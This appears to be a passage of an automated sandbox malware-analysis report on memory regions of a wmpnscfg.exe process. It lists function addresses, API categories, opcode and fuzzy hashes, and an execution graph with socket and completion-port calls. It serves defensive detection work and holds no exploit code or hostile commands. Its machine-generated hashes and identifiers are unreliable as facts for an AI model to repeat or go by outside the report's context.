                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                    • Instruction ID: 3127e076de1cd92bcb242887dd7bcd4dfa363f11402f0ab43b2fd73577bb5599
                                                                                                                    • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                    • Instruction Fuzzy Hash: C14185711187488BE769EF24D898BDBB7E0FB94301F444A1DE09BC3191EF76A615CB82
                                                                                                                    Function 00007DF488DC34A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946446413.00007DF488DC1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DC1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488dc1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EventHook
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3661607649-0
                                                                                                                    • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                    • Instruction ID: 31fad4f6a6c2b62528f9f1c0e323e78bce3c5c75d6c238e79e2e3b235a569ecc
                                                                                                                    • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                    • Instruction Fuzzy Hash: CF315231518A468FEB94EB25C485566B7F1FF65310F10463AD04FC2691DB38A849DB41
                                                                                                                    Function 000002614EFDCEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                    • Instruction ID: fd9abdf6074c1c1fdbb16dd4d94f5829681b85ae6d33dd67a38088e075abf262
                                                                                                                    • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                    • Instruction Fuzzy Hash: 1B018071214A0C8FDB45EF18E8859AAB7E9FBD8314F54462AE84AC3150EF35EA1687C1
                                                                                                                    Function 000002614EFD2908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                    • Instruction ID: e0a302661cfc457f75f8a417beb0902921103339d6654d67ce3917f5b783377c
                                                                                                                    • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                    • Instruction Fuzzy Hash: 940126317099098FFB54A77DEC88A2637D1FB89312B484074E81EC7154EA3BAC52CBC5
                                                                                                                    Function 00007DF488D93CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EventHook
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3661607649-0
                                                                                                                    • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                    • Instruction ID: af4044bfa33ab66f834c3d306d3e8dcfd1978905e324ab44ba68954dec961cb5
                                                                                                                    • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                    • Instruction Fuzzy Hash: 7111A93182CA869BE799AB308C6476B72F4FF04314F64923DD04BC20D2DB3CB0498A81
                                                                                                                    Function 000002614EFDBEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                    • Instruction ID: 71903665f54dffbefc89bb604a91a137fa5eaee4394b333db7badada14616389
                                                                                                                    • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                    • Instruction Fuzzy Hash: 4D01D130629A4C0FF781EB38D859B7B3AD6EB54301F04457AA01BC32D5EE2AE8158781
                                                                                                                    Function 000002614EFD2B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 10892065-0
                                                                                                                    • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                    • Instruction ID: 9c109aa1ee367472e528b0d27ea12847727f72bcb1de57329738ae83c1f69712
                                                                                                                    • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                    • Instruction Fuzzy Hash: 03F0E57160AA094BF754AFF67C8C7272659D384312F6C4A3BD017C7180DDBB885342C0
                                                                                                                    Function 000002614EFD69B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCallerProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2663294120-0
                                                                                                                    • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                    • Instruction ID: 852f8a51da34ce73dc505d5b7bb1e756196c9d0dd6057964b44de6422723b75f
                                                                                                                    • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                    • Instruction Fuzzy Hash: 6AE0C221706C190BAB6862AE248CA7755C6C7DC272758027BF42EC3295EC56CC924391
                                                                                                                    Function 000002614EFD74F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                    • Instruction ID: 541943992aa09f717ba71e45f896d2ea0bcad4a31fb4f599d0d13dbf75d9e4c2
                                                                                                                    • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                    • Instruction Fuzzy Hash: 90914E30219E098FEB49EF18E489EEB77A1FB54300F484569E45ACB196DE32F855CBC1
                                                                                                                    Function 000002614EFD3C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionTable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252446317-0
                                                                                                                    • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                    • Instruction ID: dee2c09367578953693efb7c00ae421a4b9a710f5d3a3eb395a74737e08d37e7
                                                                                                                    • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                    • Instruction Fuzzy Hash: 60E04F301029054BEFA8DB1DC84D7613AD0E798306F644268D505CA291CB7AD8ABCF82
                                                                                                                    Function 00007DF488D91708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionTable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252446317-0
                                                                                                                    • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                    • Instruction ID: 40a51e8ac113e688760baa844c71045fbd7fd589382bbcd30b934c833077bb68
                                                                                                                    • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                    • Instruction Fuzzy Hash: EBE04F305009098BEF98D61DC84979036E0EB58306F608269E406CA291CB3D949BCF81
                                                                                                                    Function 00007DF488DE1290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946598852.00007DF488DE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DE1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488de1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionTable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252446317-0
                                                                                                                    • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                    • Instruction ID: fdcd804e4fcc44459ad7e99dcfc076cdce71af088adbd0a56680ed9ba4707648
                                                                                                                    • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                    • Instruction Fuzzy Hash: A0E04F30A449054BEFD8D61DC80979036E0EB5C306F608669D506C9291DB39989BCF81
                                                                                                                    Function 00007DF488DC1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946446413.00007DF488DC1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DC1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488dc1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionTable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252446317-0
                                                                                                                    • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                    • Instruction ID: cf4c7bcad5e67fac9424db32c2664ae45c3185916e4814e86c3c4d1eda506174
                                                                                                                    • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                    • Instruction Fuzzy Hash: 9CE04F305009058BEFA8D71DC84975036E1EB58306FA08269D406CA2D1CB3D949BCF81
                                                                                                                    Function 00007DF488D81290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionTable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252446317-0
                                                                                                                    • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                    • Instruction ID: 2df3907314a19bcff32072a8289d847af9353dea6f48d9393c81a1d120b40a53
                                                                                                                    • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                    • Instruction Fuzzy Hash: 0FE04F309549095BEF98D71DC80A7503AE0EB5830AF608669D505C9291DB7994EFCF81
                                                                                                                    Function 000002614EFD698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction ID: 54be9baa10132eb823f2d7eaa09f4e4fb2f79168b13a69dfec3a0341c2097f6d
                                                                                                                    • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction Fuzzy Hash: B5D0A720322D0D0BEA48633D2CD9B3615C6E7CC321F54053AB41BC3281ED5ACC660341
                                                                                                                    Function 000002614EFDC994 Relevance: 1.5, APIs: 1, Instructions: 272COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: freemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3061335427-0
                                                                                                                    • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                    • Instruction ID: e7efc0fb845974f2a0860e990a0b50406958c38fcac8f65979c7b42666a87da6
                                                                                                                    • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                    • Instruction Fuzzy Hash: BB916331119B484BD765EF18E489BEBB7E1FB94310F04092ED18BC3191EE36E55587C2
                                                                                                                    Function 000002614EFDA7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                    • Instruction ID: a4ee3b814bd1c7f7a2a47a54637c1989e5a41902b5520dea9ccd4cf32e30954b
                                                                                                                    • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                    • Instruction Fuzzy Hash: C2417831215D0E8FDB94EF2CD88CE65B7E0FB68311714466AD41AC3655DF31E9A68BC0
                                                                                                                    Function 000002614EFDAA34 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                    • Instruction ID: 0a1480f08d4e1838b62beee54aa2aa79416a630769c2b2d0fce21df87112bef3
                                                                                                                    • Opcode Fuzzy Hash: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                    • Instruction Fuzzy Hash: 99219371214D1C8FDB49EF1CD88CBA177E5EBA831170842ABD81ACB255DE35E8858B81
                                                                                                                    Function 000002614EFEDBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                    • Instruction ID: 99d08faad6d514884108e298818e064217499c1abb562281bcb77eb8a261bd1b
                                                                                                                    • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                    • Instruction Fuzzy Hash: 821180302019198FFF759F6D988876632E0FB58765F18017AE809CB195CF72AC94C7D1
                                                                                                                    Function 00007DF488DA063C Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                    • Instruction ID: 34991956b5d69d54e83a8be1705db69c78e95c1504bc8babe0b29e7577a2d171
                                                                                                                    • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                    • Instruction Fuzzy Hash: CF116130A04915CFFFA5EF6884947A632E4EF94315F18027BE80FCA199CB349C88C791
                                                                                                                    Function 000002614EFDA9D4 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                    • Instruction ID: d37687cc92a3bafed83864cfe5463d5a3141606834b4113441c8c20b75d52245
                                                                                                                    • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                    • Instruction Fuzzy Hash: 4CF09070212E0F8FEB84EF19D0D8B6177E0FBA8306F640129D05AC3590DB729C65C745

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:197
                                                                                                                    Total number of Limit Nodes:5
                                                                                                                    execution_graph 13741 255e9c130d8 13743 255e9c1310b 13741->13743 13744 255e9c1311d 13743->13744 13745 255e9c146c4 13743->13745 13748 255e9c146d6 13745->13748 13747 255e9c146ef 13747->13744 13748->13747 13749 255e9c14634 13748->13749 13750 255e9c1464f 13749->13750 13752 255e9c14660 13750->13752 13753 255e9c18110 13750->13753 13752->13747 13755 255e9c18119 13753->13755 13756 255e9c181d2 13753->13756 13754 255e9c180cc free 13754->13756 13758 255e9c181a3 13755->13758 13759 255e9c180cc 13755->13759 13756->13752 13758->13754 13758->13756 13760 255e9c180f1 13759->13760 13761 255e9c180d1 13759->13761 13760->13758 13761->13760 13762 255e9c180e7 free 13761->13762 13762->13760 13763 255e9c36f3c SetErrorMode 13764 255e9c36f50 13763->13764 13765 255e9c3a516 socket 13764->13765 13766 255e9c3a5a3 socket 13765->13766 13767 255e9c3a55a getsockopt 13765->13767 13769 255e9c3a5c3 13766->13769 13767->13766 13963 255e9c131dc 13964 255e9c131f9 13963->13964 13965 255e9c13218 13964->13965 13966 255e9c13203 13964->13966 13972 255e9c14350 13965->13972 13967 255e9c146c4 free 13966->13967 13968 255e9c1320b 13967->13968 13970 255e9c132a7 13976 255e9c14864 13970->13976 13973 255e9c14368 13972->13973 13979 255e9c19d58 13973->13979 13975 255e9c143c0 13975->13970 13977 255e9c17fcc free 13976->13977 13978 255e9c14877 13977->13978 13978->13968 13980 255e9c19d80 13979->13980 13981 255e9c19b84 free 13980->13981 13982 255e9c19d8c 13980->13982 13981->13982 13982->13975 13811 255e9c128a0 13812 255e9c128bc 13811->13812 13813 255e9c128ca 13812->13813 13814 255e9c128c1 GetProcAddressForCaller 13812->13814 13814->13813 13831 255e9c15540 13832 255e9c1555e 13831->13832 13834 255e9c1558a 13832->13834 13835 255e9c153d4 13832->13835 13836 255e9c153d9 13835->13836 13837 255e9c15416 13835->13837 13836->13837 13838 255e9c146c4 free 13836->13838 13837->13834 13838->13837 13938 255e9c14480 13940 255e9c1449a 13938->13940 13939 255e9c144da 13940->13939 13942 255e9c14224 13940->13942 13943 255e9c1429c 13942->13943 13944 255e9c1423b 13942->13944 13943->13939 13944->13943 13946 255e9c1aacc 13944->13946 13947 255e9c1aaec 13946->13947 13951 255e9c1acb8 13946->13951 13948 255e9c19ef4 free 13947->13948 13947->13951 13949 255e9c1aafa 13948->13949 13950 255e9c17fcc free 13949->13950 13949->13951 13952 255e9c1ab18 13949->13952 13950->13952 13951->13944 13952->13951 13953 255e9c19b84 free 13952->13953 13954 255e9c17fcc free 13952->13954 13953->13952 13954->13952 13819 255e9c395a4 13820 255e9c395b3 13819->13820 13821 255e9c395d6 13819->13821 13820->13821 13823 255e9c38024 13820->13823 13826 255e9c37ef0 13823->13826 13825 255e9c3806d 13825->13821 13827 255e9c37f14 socket 13826->13827 13830 255e9c37f2c 13826->13830 13828 255e9c37f47 13827->13828 13827->13830 13829 255e9c37b00 2 API calls 13828->13829 13828->13830 13829->13830 13830->13825 13959 255e9c157c8 13962 255e9c157e5 13959->13962 13960 255e9c15871 13961 255e9c153d4 free 13961->13960 13962->13960 13962->13961 13770 255e9c180cc 13771 255e9c180f1 13770->13771 13772 255e9c180d1 13770->13772 13772->13771 13773 255e9c180e7 free 13772->13773 13773->13771 13846 255e9c19f6c 13847 255e9c19f86 13846->13847 13851 255e9c19fab 13846->13851 13847->13851 13852 255e9c19ef4 13847->13852 13853 255e9c19f04 13852->13853 13855 255e9c19f5e 13852->13855 13853->13855 13860 255e9c19eac 13853->13860 13855->13851 13856 255e9c17fcc 13855->13856 13857 255e9c17ff9 13856->13857 13858 255e9c17fdc 13856->13858 13857->13851 13858->13857 13870 255e9c17f9c 13858->13870 13861 255e9c19ee7 13860->13861 13863 255e9c19eba 13860->13863 13861->13855 13862 255e9c19ed1 13862->13861 13864 255e9c17fcc free 13862->13864 13863->13861 13863->13862 13866 255e9c19b84 13863->13866 13864->13861 13867 255e9c19b9b 13866->13867 13868 255e9c180cc free 13867->13868 13869 255e9c19bae 13867->13869 13868->13869 13869->13862 13871 255e9c17faa 13870->13871 13873 255e9c17fc0 13870->13873 13871->13873 13874 255e9c1f1f4 13871->13874 13873->13858 13875 255e9c1f208 13874->13875 13876 255e9c1f247 13874->13876 13875->13876 13878 255e9c19aac 13875->13878 13876->13873 13879 255e9c19ac6 13878->13879 13880 255e9c180cc free 13879->13880 13881 255e9c19af6 13879->13881 13880->13881 13881->13876 13882 255e9c1330c 13883 255e9c13378 13882->13883 13884 255e9c1331e 13882->13884 13884->13883 13886 255e9c15774 13884->13886 13887 255e9c15779 13886->13887 13889 255e9c1579b 13886->13889 13887->13889 13890 255e9c155e0 13887->13890 13889->13884 13891 255e9c1560c 13890->13891 13895 255e9c156b1 13891->13895 13896 255e9c14918 13891->13896 13893 255e9c15697 13894 255e9c153d4 free 13893->13894 13893->13895 13894->13895 13895->13889 13897 255e9c1493e 13896->13897 13898 255e9c146c4 free 13897->13898 13899 255e9c14946 13897->13899 13898->13899 13899->13893 13900 255e9c12f2c 13902 255e9c12f46 13900->13902 13903 255e9c13043 13900->13903 13901 255e9c146c4 free 13906 255e9c13041 13901->13906 13902->13903 13904 255e9c12fc9 13902->13904 13902->13906 13903->13901 13904->13906 13907 255e9c15ce8 13904->13907 13911 255e9c15d04 13907->13911 13913 255e9c15d86 13907->13913 13908 255e9c15d81 13908->13906 13909 255e9c15d79 13910 255e9c146c4 free 13909->13910 13910->13908 13911->13909 13912 255e9c153d4 free 13911->13912 13912->13911 13913->13908 13915 255e9c1587c 13913->13915 13916 255e9c158c3 13915->13916 13920 255e9c1594e 13915->13920 13917 255e9c158cc 13916->13917 13918 255e9c15b2c 13916->13918 13917->13920 13921 255e9c153d4 free 13917->13921 13919 255e9c155e0 free 13918->13919 13918->13920 13919->13920 13920->13913 13921->13920 13774 255e9c37ef0 13775 255e9c37f14 socket 13774->13775 13778 255e9c37f2c 13774->13778 13776 255e9c37f47 13775->13776 13775->13778 13776->13778 13779 255e9c37b00 13776->13779 13780 255e9c37b32 13779->13780 13781 255e9c37b55 CreateIoCompletionPort 13780->13781 13784 255e9c37b3d 13780->13784 13782 255e9c37b6d 13781->13782 13783 255e9c37ba2 SetFileCompletionNotificationModes 13782->13783 13782->13784 13783->13784 13784->13778 13785 255e9c12690 13788 255e9c128d4 13785->13788 13789 255e9c126a2 13788->13789 13790 255e9c128dd 13788->13790 